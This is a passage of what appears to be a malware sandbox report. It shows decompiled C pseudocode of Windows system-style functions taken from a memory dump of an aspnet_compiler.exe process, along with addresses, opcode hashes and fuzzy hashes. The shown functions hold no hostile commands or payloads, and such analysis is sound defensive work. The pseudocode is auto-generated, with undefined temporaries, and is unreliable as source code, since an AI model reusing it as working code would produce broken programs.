				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x133d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0128FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0130138a
0x0130138a
0x01301399
0x013013a3
0x013013a8
0x013013aa
0x013013b5
0x013013bb
0x013013c3
0x013013c6
0x013013c9
0x013013d4
0x013013e6
0x013013d6
0x013013df
0x013013df
0x013013f1
0x013013f2
0x013013f4
0x013013f9
0x0130140e

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898bb124379b61a81cf0f801b3dc32a2f2cab2f0683bb000fc64f22e0d1296fa
Instruction ID: b25135855afaacfa506561331f4a575b00872eb19b813c4e0e56baca4c7154ac
Opcode Fuzzy Hash: 898bb124379b61a81cf0f801b3dc32a2f2cab2f0683bb000fc64f22e0d1296fa
Instruction Fuzzy Hash: CE018071A11218AFDB10EFA8D881BAEBBB8EF54714F004056B900AB280D674DA40C794

Uniqueness

Uniqueness Score: -1.00%

Function 013014FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E013014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x133d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0128FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x013014fb
0x013014fb
0x0130150a
0x01301514
0x01301519
0x0130151b
0x01301526
0x0130152c
0x01301534
0x01301537
0x0130153a
0x01301545
0x01301557
0x01301547
0x01301550
0x01301550
0x01301562
0x01301563
0x01301565
0x0130156a
0x0130157f

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5477ec312c8c22e5868afa94ed3ad3b20858c963b76766f099482a8635543f
Instruction ID: c0c9327ab08039c7a9dc5648c57d5a474f242459b04151df8c65f27a30acb1ba
Opcode Fuzzy Hash: bb5477ec312c8c22e5868afa94ed3ad3b20858c963b76766f099482a8635543f
Instruction Fuzzy Hash: 44019E71A11258AFDB10EFA8D841EBEBBBCEF44714F40406AF905EB380DA74DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012458EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x133d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1225c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01245943() != 0 &&  *0x1335320 > 5) {
					E012C7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E012C7B5E( &_v28, _t28);
					_t11 = E012C7B9C(0x1335320, 0x122bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0128B640(_t11, _t17, _v8 ^ _t29, 0x122bf15, _t27, _t28);
			}

0x012458fb
0x012458fe
0x01245906
0x0124590a
0x0124593c
0x0124593c
0x0124590c
0x0124590c
0x01245911
0x00000000
0x01245913
0x01245913
0x01245913
0x01245911
0x0124591d
0x012a1035
0x012a103c
0x012a103f
0x012a1056
0x012a1056
0x0124593b

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b450eb3b5dc781ceacabb91bed24ce0f00e389eeaa5b596c916a2201c1fdd8b8
Instruction ID: 4ab6c974dc48be252f29104460f8f99e9350c0c2277d0d9631676e92132d3098
Opcode Fuzzy Hash: b450eb3b5dc781ceacabb91bed24ce0f00e389eeaa5b596c916a2201c1fdd8b8
Instruction Fuzzy Hash: 8701F239A30105ABC718EA28C801ABE77ACEF85630F840169EA059B244EE70DD01C794

Uniqueness

Uniqueness Score: -1.00%

Function 0125B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01267D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E012C7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0125b037
0x0125b039
0x0125b03b
0x0125b040
0x012aa60e
0x00000000
0x00000000
0x012aa61d
0x0125b04b
0x0125b04e
0x012aa627
0x012aa634
0x00000000
0x00000000
0x012aa641
0x012aa653
0x012aa643
0x012aa64c
0x012aa64c
0x012aa65b
0x00000000
0x00000000
0x00000000
0x012aa66c
0x0125b057
0x0125b057
0x0125b057
0x0125b046
0x0125b046
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: c74877ad3795d363223cb04ea27fd3cc4e0b419b1ba4e92095aa1704aa5c6eb1
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 80018F722209819FE762871CC988F767BDDEF85B54F0940A1FB19CBA91D778DC40CA20

Uniqueness

Uniqueness Score: -1.00%

Function 01311074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01311074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0131165E(__ebx, 0x1338ae4, (__edx -  *0x1338b04 >> 0x14) + (__edx -  *0x1338b04 >> 0x14), __edi, __ecx, (__edx -  *0x1338b04 >> 0x14) + (__edx -  *0x1338b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0130AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01267D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E012FFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01311074
0x01311080
0x01311082
0x0131108a
0x0131108f
0x01311093
0x013110ab
0x013110ab
0x013110c3
0x013110cf
0x013110e1
0x013110d1
0x013110da
0x013110da
0x013110e9
0x013110f5
0x013110f5
0x013110fe

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5b94218649a7d34d0179b71f95a5d05e0171a1dfd2871a0ba43e9790ba2765
Instruction ID: 9fece35451ac6a8b1695b717e202b12f246f6b89279dd66bfaf85ef754881cc6
Opcode Fuzzy Hash: 0f5b94218649a7d34d0179b71f95a5d05e0171a1dfd2871a0ba43e9790ba2765
Instruction Fuzzy Hash: 0C014C72A047429FD715DF3CCD00B5A7BD9ABD4318F04CA29FA8583694DE30D554CB92

Uniqueness

Uniqueness Score: -1.00%

Function 012FFE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E012FFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x133d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0128FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x012ffe3f
0x012ffe3f
0x012ffe4e
0x012ffe58
0x012ffe5d
0x012ffe5f
0x012ffe6a
0x012ffe72
0x012ffe75
0x012ffe78
0x012ffe83
0x012ffe95
0x012ffe85
0x012ffe8e
0x012ffe8e
0x012ffea0
0x012ffea1
0x012ffea3
0x012ffea8
0x012ffebd

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4a05f62d86599b988778ddbb4bce250f06b97da75bde109da03dc2ae4f5954
Instruction ID: 44511fe3d4fd6108fb0bc4a86c91107ef5f51e20e118a1c6c88b6fa24679d1b3
Opcode Fuzzy Hash: 0f4a05f62d86599b988778ddbb4bce250f06b97da75bde109da03dc2ae4f5954
Instruction Fuzzy Hash: 6F01D471E11209AFDB14EFA8D841FBEBBB8EF40B14F00406ABA00AB381DA70D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 012FFEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E012FFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x133d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0128FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x012ffec0
0x012ffec0
0x012ffecf
0x012ffed9
0x012ffede
0x012ffee0
0x012ffeeb
0x012ffef3
0x012ffef6
0x012ffef9
0x012fff04
0x012fff16
0x012fff06
0x012fff0f
0x012fff0f
0x012fff21
0x012fff22
0x012fff24
0x012fff29
0x012fff3e

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17c8a98aa2a521d7353b747632863a13eb037ab00cbcced05c4f0f37b0ddbd5
Instruction ID: afdfe9982e3c6f1fbfffcde3721257b4ca8f117c464661470a27217b2796e231
Opcode Fuzzy Hash: b17c8a98aa2a521d7353b747632863a13eb037ab00cbcced05c4f0f37b0ddbd5
Instruction Fuzzy Hash: AD01D471A11209AFDB14EBA8D845FBEBBB8EF44710F40406ABA00AB3D0DA70DA00C794

Uniqueness

Uniqueness Score: -1.00%

Function 01318A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01318A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x133d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01318a62
0x01318a71
0x01318a79
0x01318a82
0x01318a85
0x01318a89
0x01318a8c
0x01318a8f
0x01318a92
0x01318a95
0x01318a9f
0x01318ab1
0x01318aa1
0x01318aaa
0x01318aaa
0x01318abc
0x01318abd
0x01318abf
0x01318ac4
0x01318ada

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c74478241f0f5221f59fbd754d5132b2f867cae3777973f5cbc482af55e54b
Instruction ID: ebb88c6701cc8e57b8919ed19f41e09c5a1ceb2a0eb8cf94d010e92421f51778
Opcode Fuzzy Hash: 29c74478241f0f5221f59fbd754d5132b2f867cae3777973f5cbc482af55e54b
Instruction Fuzzy Hash: F5012C72A1121DAFDB04DFA9D9819EEBBB8EF58314F10405AF905E7391D734A900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01318ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01318ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x133d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01267D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0128B640(E01289AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01318ed6
0x01318ee5
0x01318eed
0x01318ef0
0x01318efa
0x01318f03
0x01318f0c
0x01318f15
0x01318f24
0x01318f27
0x01318f31
0x01318f43
0x01318f33
0x01318f3c
0x01318f3c
0x01318f4e
0x01318f4f
0x01318f51
0x01318f56
0x01318f69

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a32bb9f3bac02a53c1959d6f92a9e870fd7aadcee842eb8bffb12ee41907ee
Instruction ID: 8dc17ec215f400894a2a0a32b1d476cc22e6542efa97163cf3a9a167a03ea7b4
Opcode Fuzzy Hash: b6a32bb9f3bac02a53c1959d6f92a9e870fd7aadcee842eb8bffb12ee41907ee
Instruction Fuzzy Hash: 1D111E70A152199FDB04DFA8D441BAEFBF4FF08304F0442AAE519EB781E6349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0124DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0124DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0124E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0124E8B0(__ecx, _t14, 0xfff);
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0124db64
0x0124db66
0x0124db6b
0x0124dbaa
0x0124db71
0x0124db76
0x0124db7a
0x0124dba3
0x0124db7c
0x0124db87
0x0124db8b
0x012a4fa1
0x012a4fb3
0x012a4fb8
0x0124db91
0x0124db96
0x0124db98
0x0124db98
0x0124db8b
0x0124db7a
0x0124db9d
0x0124dba2

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: c4fff6855d189df39ed1ac8f938e7fc1d6df7265d41355a8fef7c9fb460d8e2d
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: CDF0FC332616279FE73A6AD94880F27B6999FF1A60F160035F3059B344D9A48C0286D0

Uniqueness

Uniqueness Score: -1.00%

Function 0124B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01267D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01267D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E012C7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0124b1e8
0x0124b1ea
0x0124b1f3
0x012a4a17
0x0124b1f9
0x0124b1f9
0x0124b1f9
0x0124b201
0x012a4a21
0x012a4a2e
0x00000000
0x00000000
0x012a4a3b
0x012a4a4d
0x012a4a3d
0x012a4a46
0x012a4a46
0x012a4a55
0x00000000
0x00000000
0x00000000
0x0124b20a
0x0124b20a
0x0124b20a
0x0124b20a

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: ea2e257e71b10b0e87ac766fb66198497631fa4546a14121a5cfc7434e11d6f3
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: D701F4322306C19BE326A75DC814F69BB98EF91754F0C04A1FF148B6B2D7B8C840C715

Uniqueness

Uniqueness Score: -1.00%

Function 012DFE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E012DFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x133d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x012dfe96
0x012dfe9e
0x012dfea1
0x012dfead
0x012dfeb3
0x012dfeb9
0x012dfec3
0x012dfed5
0x012dfec5
0x012dfece
0x012dfece
0x012dfee0
0x012dfee1
0x012dfee3
0x012dfee8
0x012dfefb

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c35aa656837c2dc0251a4d8da936d24ed1d4e14044dc429427eff0eb974b375
Instruction ID: 10f85aa2c05e6b4d428295d5ab92c0411e74fa9d3f208559cb7d79a6d3c3dff8
Opcode Fuzzy Hash: 2c35aa656837c2dc0251a4d8da936d24ed1d4e14044dc429427eff0eb974b375
Instruction Fuzzy Hash: 37016271A10209AFCB14DFA8D542A6EB7F4EF14704F104159A505DB382D635D902CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0130131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0130131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x133d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0130131b
0x0130132a
0x01301330
0x01301336
0x0130133e
0x01301341
0x01301344
0x0130134f
0x01301361
0x01301351
0x0130135a
0x0130135a
0x0130136c
0x0130136d
0x0130136f
0x01301374
0x01301387

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2073f3676d93190fd09c8b8ba311aa5eace74922464a29977b762ed126ad2939
Instruction ID: e96018447fb89d0c415a69951a5dcce0127ffd8fef92dfe1b71ad592256c23e7
Opcode Fuzzy Hash: 2073f3676d93190fd09c8b8ba311aa5eace74922464a29977b762ed126ad2939
Instruction Fuzzy Hash: D001AF71A1120CAFCB40EFA8D545AAEB7F8FF18304F008099F805EB381E630DA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01318F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01318F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x133d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01318f6a
0x01318f79
0x01318f81
0x01318f84
0x01318f8b
0x01318f91
0x01318f94
0x01318f9e
0x01318fb0
0x01318fa0
0x01318fa9
0x01318fa9
0x01318fbb
0x01318fbc
0x01318fbe
0x01318fc3
0x01318fd6

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cdfeed7d54523edd5f288b2183eb57c074af2788a8ce0c4d5813f732dc6738
Instruction ID: 6c1dc36629b11881b6d6a8a90e388e138d3d1a7bcc3ed03c6c69fe584803d004
Opcode Fuzzy Hash: 74cdfeed7d54523edd5f288b2183eb57c074af2788a8ce0c4d5813f732dc6738
Instruction Fuzzy Hash: 63014474A1120DAFDB04EFA8D545AAEB7F8EF58304F504459B905EB380DB34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01301608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01301608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
